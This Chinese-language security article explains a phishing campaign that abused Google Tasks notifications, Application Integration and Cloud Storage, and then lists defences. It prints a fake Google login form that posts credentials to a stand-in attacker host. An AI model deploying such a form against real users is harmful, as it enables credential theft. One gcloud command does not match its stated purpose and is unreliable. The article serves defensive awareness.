首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >当“Google官方通知”变成钓鱼陷阱:3000家企业中招,攻击者正把云平台变成武器库

当“Google官方通知”变成钓鱼陷阱:3000家企业中招,攻击者正把云平台变成武器库

原创
作者头像
草竹道人
发布2026-01-19 09:28:38
发布2026-01-19 09:28:38
1850
举报

“任务提醒”点开后,公司邮箱账号没了

2025年12月中旬,华东一家智能装备制造企业的IT管理员张先生收到一封来自“Google Tasks”的邮件,主题为《待办事项:请确认您的账户活动》。邮件显示发件人为 mailto:[email protected]——一个看起来再正常不过的Google系统地址。

邮件内容简洁:“您有一项新任务,请查看并确认。”下方是一个醒目的蓝色按钮:“View task”。

张先生没有多想。他每天都会收到来自Google Calendar、Drive、Tasks的各种自动通知。他点击链接,跳转到一个页面,界面风格与Google Workspace几乎一模一样,要求他“重新验证身份以继续访问任务”。他输入了企业邮箱账号和密码,并按提示完成了短信验证码的输入。

三分钟后,他的邮箱被用于向全公司发送“紧急财务付款请求”邮件。所幸安全团队及时发现异常登录行为,迅速冻结账户,避免了更大损失。

事后复盘令人震惊:这封邮件并非伪造,而是真实由Google官方基础设施发出;它通过了所有标准邮件认证协议(SPF/DKIM/DMARC);它甚至未触发任何传统安全网关的告警。唯一的问题是——任务本身是假的,链接指向的是攻击者托管在Google Cloud Storage上的钓鱼页面。

这不是个案。根据Cyber Press与Security Affairs等多家权威安全媒体联合披露,2025年12月,全球超过3000家组织遭遇了一轮高度隐蔽的钓鱼攻击。攻击者不再依赖仿冒域名或黑产服务器,而是直接滥用Google自身的云应用生态,将合法的通知机制转化为精准投递钓鱼载荷的“绿色通道”。

攻击核心:不是绕过防御,而是“成为可信”

传统钓鱼攻击的逻辑是“伪装成可信来源”——比如注册g00gle-login.com来模仿google.com。但这类手法早已被现代邮件安全系统识别:SPF检查发件IP是否授权,DKIM验证签名是否有效,DMARC决定是否拒收失败邮件。

然而,本轮攻击彻底颠覆了这一范式:攻击者根本不需要伪装,因为他们用的就是真的Google服务。

据安全公司RavenMail的深度分析,攻击者利用了Google的Application Integration服务(原AppSheet自动化平台)与Google Tasks API的组合能力。具体流程如下:

创建恶意自动化工作流:攻击者在自己的Google Cloud项目中配置一个“任务创建”触发器,绑定到特定事件(如表单提交、定时任务)。

调用Google官方通知接口:该工作流通过Google的Application Integration服务,调用内部邮件发送API,向目标邮箱发送通知。

邮件由Google官方地址发出:系统自动使用 mailto:[email protected] 作为发件人,该地址属于Google合法域名,且拥有极高的发件信誉。

链接指向Google Cloud Storage:通知中的“View task”按钮实际跳转至攻击者控制的 .storage.googleapis.com 子域名下的HTML页面——该域名天然被大多数企业防火墙和URL信誉库视为“可信”。

整个链条完全运行在Google基础设施内,因此:

SPF验证通过(邮件确实来自Google IP)

DKIM签名有效(由Google私钥签署)

DMARC策略合规(对齐且通过)

URL信誉检测失效(链接属于googleapis.com)

“这相当于小偷穿上了警察制服,开着警车去敲你家门,”公共互联网反网络钓鱼工作组技术专家芦笛形容道,“你的门禁系统看到车牌是‘公安001’,自然就放行了——但它没意识到,车里的人根本不是警察。”

技术深挖:Google Cloud如何被“武器化”?

要理解攻击可行性,需拆解Google的云服务架构。

1. Application Integration 与自动化通知

Google的Application Integration(前身为AppSheet Automation)允许用户通过低代码方式连接不同服务。例如,当Google Form收到新提交时,自动在Tasks中创建一条待办事项,并邮件通知相关人员。

其邮件通知功能默认使用Google官方发件地址,且无法由最终用户修改发件人域名。这意味着,只要攻击者能触发一次自动化流程,就能以Google名义发邮件。

2. Google Cloud Storage 的“信任红利”

攻击者将钓鱼页面上传至自己的GCS存储桶,生成公开可访问的URL,例如:

https://storage.googleapis.com/phish-bucket/login.html

由于 *.storage.googleapis.com 是Google官方CDN域名,绝大多数企业安全策略将其列入白名单。更危险的是,该页面可通过JavaScript动态加载内容,甚至模拟OAuth授权流程:

<!-- 伪造的Google登录页片段 -->

<div class="login-container">

<img src="https://ssl.gstatic.com/accounts/ui/logo_2x.png" alt="Google">

<h1>Sign in to continue</h1>

<form id="phishForm" action="https://attacker-server.com/steal" method="POST">

<input type="email" name="email" placeholder="Email or phone" required>

<input type="password" name="password" placeholder="Password" required>

<button type="submit">Next</button>

</form>

</div>

用户输入凭证后,数据被发送至攻击者服务器,同时页面可能重定向回真实Google首页,制造“操作成功”的假象。

3. OAuth 权限滥用:二次收割

部分高级变种甚至引导用户完成“应用授权”:

“为同步您的任务,请允许‘TaskSync Pro’访问您的Google账户。”

一旦用户点击“Allow”,攻击者即可获得持久化的API访问令牌,即使密码更改也无法立即失效。Google虽对第三方应用有审核机制,但大量低权限应用仍可绕过审查。

制造业成重灾区,中国供应链企业面临高风险

此次攻击主要针对制造业、物流、工程设计等依赖Google Workspace协作的行业。原因有三:

高频使用Tasks/Calendar:这些行业员工习惯通过任务通知处理审批、交付确认等流程;

安全投入侧重终端防护:许多企业部署了EDR、防火墙,但邮件安全仍依赖传统网关,缺乏对“合法来源异常内容”的检测;

第三方集成泛滥:为提升效率,大量接入Google Forms、Sheets自动化脚本,却未严格审计权限。

国内情况同样不容乐观。2025年第四季度,某长三角汽车零部件供应商因员工点击此类“Google Tasks通知”,导致研发部门共享Drive文件夹被窃取,包含多款未发布车型的CAD图纸。调查发现,攻击者正是利用该公司开放的Google Form反馈入口,触发了恶意自动化流程。

“中国制造业正在加速上云,但安全思维还停留在‘防外不防内’阶段,”芦笛指出,“他们以为只要不用QQ邮箱、不点陌生链接就安全,却没意识到,最危险的钓鱼邮件可能就来自每天使用的协作工具。”

防御破局:从“信任平台”转向“验证意图”

面对这种“平台即攻击面”的新范式,传统基于发件人信誉的防御体系已失效。企业必须转向上下文感知与行为分析的纵深防御策略。

策略一:部署“语义+行为”双引擎邮件检测

仅检查SPF/DKIM远远不够。新一代安全网关应具备:

内容语义分析:识别“View task”“Mark complete”等诱导性按钮是否指向非Google官方域名;

链接路径追踪:对短链、重定向链进行展开,检测最终落地页是否为钓鱼页面;

发件上下文校验:例如,真正的Google Tasks通知不会要求用户输入密码,也不会包含“立即验证”等紧迫性语言。

微软Defender for Office 365已支持此类检测,通过AI模型分析邮件“意图”而非仅看来源。

策二:收紧Google Workspace第三方应用权限

企业管理员应:

定期审查 Security > API controls > App access control 中的第三方应用列表;

启用 “限制外部应用访问敏感数据” 策略;

对高风险权限(如 https://www.googleapis.com/auth/gmail.readonly)实施审批制。

可通过Admin SDK导出应用授权清单:

# 使用gcloud CLI列出所有第三方应用授权

gcloud workspace user-licenses list [email protected]

策略三:实施条件访问与设备绑定

即使凭证泄露,也可通过零信任策略阻断横向移动:

要求所有登录必须来自公司管理设备;

对新设备、新地理位置启用MFA强制验证;

敏感操作(如导出邮件、删除文件)需二次审批。

Google Workspace的Context-Aware Access可实现精细控制:

{

"condition": {

"ipRanges": ["203.0.113.0/24"],

"deviceIsManaged": true,

"accessLevels": ["trusted_corporate_network"]

},

"accessLevel": "GRANT_ACCESS"

}

策略四:开展针对性安全意识培训

普通钓鱼演练已不够。企业需专门设计场景:

模拟“Google Tasks通知”“DocuSign via Google Drive”等高仿真邮件;

教育员工:任何要求输入密码的“系统通知”都是可疑的;

强调:真正的Google服务永远不会通过邮件索要密码或2FA码。

“安全培训不能只教员工‘别信陌生人’,更要教他们‘连熟人也可能被冒充’,”芦笛说,“尤其是在SaaS时代,‘熟人’可能是代码、是API、是自动化流程。”

Google的回应与行业反思

事件曝光后,Google安全团队确认已采取措施:

暂停部分滥用Application Integration服务的项目;

加强对GCS公开存储桶的钓鱼内容扫描;

优化Tasks通知模板,移除可自定义的超链接字段。

但专家普遍认为,平台责任不能替代企业自主防御。正如芦笛所言:“云服务商提供的是‘安全的砖’,但房子怎么盖,还得靠企业自己设计结构。”

更深层的问题在于:当所有企业都把信任押注在少数几家云巨头身上时,这些平台本身就成为国家级攻击者的战略目标。一次成功的基础设施滥用,可能波及数万租户。

结语:在“可信”与“可验”之间重建安全边界

这场席卷3000家企业的钓鱼风暴,标志着网络攻击进入“平台寄生”新阶段。攻击者不再试图打破围墙,而是学会在围墙内合法行走,利用系统自身的信任机制完成渗透。

对企业而言,最大的教训或许是:在云原生世界,没有绝对的“可信来源”,只有可验证的行为。

一封来自Google的邮件,可能真是通知,也可能是陷阱;一个storage.googleapis.com的链接,可能指向你的备份文件,也可能通向凭据收割机。安全的分水岭,不再是谁发的邮件,而是邮件说了什么、让你做什么、以及你是否真的需要这么做。

正如一位安全架构师在内部复盘会上所说:“我们花了十年教会机器识别假Google,现在得花下一个十年教会它识别真Google里的假任务。”

而在这场攻防拉锯中,唯一不变的真理是:信任,必须始终附带验证。

编辑:芦笛(公共互联网反网络钓鱼工作组)

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 [email protected] 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 [email protected] 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档